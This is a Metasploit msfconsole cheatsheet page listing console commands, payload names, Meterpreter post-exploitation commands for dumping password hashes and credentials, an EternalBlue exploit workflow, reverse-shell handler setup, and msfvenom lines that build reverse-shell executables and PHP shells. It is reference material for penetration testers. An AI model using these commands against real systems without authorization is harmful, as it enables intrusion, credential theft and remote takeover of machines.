__ _______________________ _________._________________________ \_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/ | __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_ | \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \ \___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ / \/ \/ \/ \/ \/ \/ \/

msfconsole Cheatsheet

← Back to cheatsheets

← Home

msfconsole is the primary interface to the Metasploit Framework - the world's most used penetration testing tool. It provides exploit development, payload generation, post-exploitation, and much more.

Starting Metasploit

  • msfconsole - Start console
  • msfconsole -q - Quiet mode (no banner)
  • msfconsole -r script.rc - Run resource script
  • msfconsole -x "commands" - Execute commands

Core Commands

  • help - Show help
  • search <term> - Search modules
  • use <module> - Select module
  • info - Module information
  • show options - Show required options
  • show advanced - Show advanced options
  • set <option> <value> - Set option
  • setg <option> <value> - Set global option
  • unset <option> - Clear option
  • run / exploit - Execute module
  • back - Exit current module
  • exit - Quit msfconsole

Search Syntax

  • search <term> - Basic search
  • search type:exploit <term> - By type
  • search platform:windows - By platform
  • search name:smb - By name
  • search cve:2021 - By CVE year
  • search author:hdm - By author
  • search rank:excellent - By rank

Module Types

  • exploit - Exploitation modules
  • auxiliary - Scanning, fuzzing, etc.
  • post - Post-exploitation
  • payload - Payloads (shellcode)
  • encoder - Payload encoders
  • nop - NOP generators
  • evasion - Evasion modules

Module Commands

  • show exploits - List exploits
  • show auxiliary - List auxiliary
  • show payloads - List payloads (context-aware)
  • show encoders - List encoders
  • show targets - Show exploit targets
  • show options - Current module options
  • check - Check if target is vulnerable

Payload Options

  • set PAYLOAD <payload> - Set payload
  • set LHOST <ip> - Local host (listener)
  • set LPORT <port> - Local port (listener)
  • set RHOST <ip> - Remote host (target)
  • set RHOSTS <ip/range> - Remote hosts
  • set RPORT <port> - Remote port

Common Payloads

Windows

  • windows/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_https
  • windows/shell/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp

Linux

  • linux/x86/meterpreter/reverse_tcp
  • linux/x64/meterpreter/reverse_tcp
  • linux/x86/shell/reverse_tcp

Multi-platform

  • multi/handler - Catch incoming connections
  • generic/shell_reverse_tcp

Session Management

  • sessions - List active sessions
  • sessions -i <id> - Interact with session
  • sessions -k <id> - Kill session
  • sessions -K - Kill all sessions
  • sessions -u <id> - Upgrade to meterpreter
  • background / bg - Background session

Meterpreter Commands

Core

  • help - Show commands
  • background - Background session
  • exit - Terminate session
  • sysinfo - System information
  • getuid - Current user
  • getpid - Process ID

File System

  • pwd - Print working directory
  • cd - Change directory
  • ls - List files
  • cat - Display file
  • download file - Download file
  • upload file - Upload file
  • rm file - Remove file
  • mkdir dir - Create directory
  • search -f pattern - Search files

Process

  • ps - List processes
  • migrate <pid> - Migrate to process
  • kill <pid> - Kill process
  • execute -f cmd - Execute command

Network

  • ipconfig / ifconfig - Network info
  • netstat - Network connections
  • portfwd - Port forwarding
  • route - Routing table

Privilege Escalation

  • getsystem - Attempt SYSTEM
  • hashdump - Dump password hashes
  • load kiwi - Load Mimikatz
  • creds_all - All credentials (kiwi)

Database Commands

  • db_status - Database status
  • workspace - Manage workspaces
  • hosts - List hosts in DB
  • services - List services
  • vulns - List vulnerabilities
  • creds - List credentials
  • loot - List loot
  • db_nmap - Run nmap, save to DB
  • db_import file - Import scan results

Common Workflows

Exploit Workflow

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

Handler Setup

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j

Port Scan

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445
run

SMB Enumeration

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

Payload Generation (msfvenom)

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw

# List formats
msfvenom --list formats

Resource Scripts

Create .rc files to automate tasks:

# handler.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
exploit -j

Run with: msfconsole -r handler.rc

Tips

  • Always run db_status to ensure database is connected
  • Use workspaces to organize different engagements
  • Use -j with exploit to run as job (background)
  • Check if target is vulnerable before exploiting
  • Use staged payloads for smaller initial size
  • Use HTTPS payloads to bypass firewalls
  • Update regularly: msfupdate
  • Only use with proper authorization

← Back to cheatsheets

← Home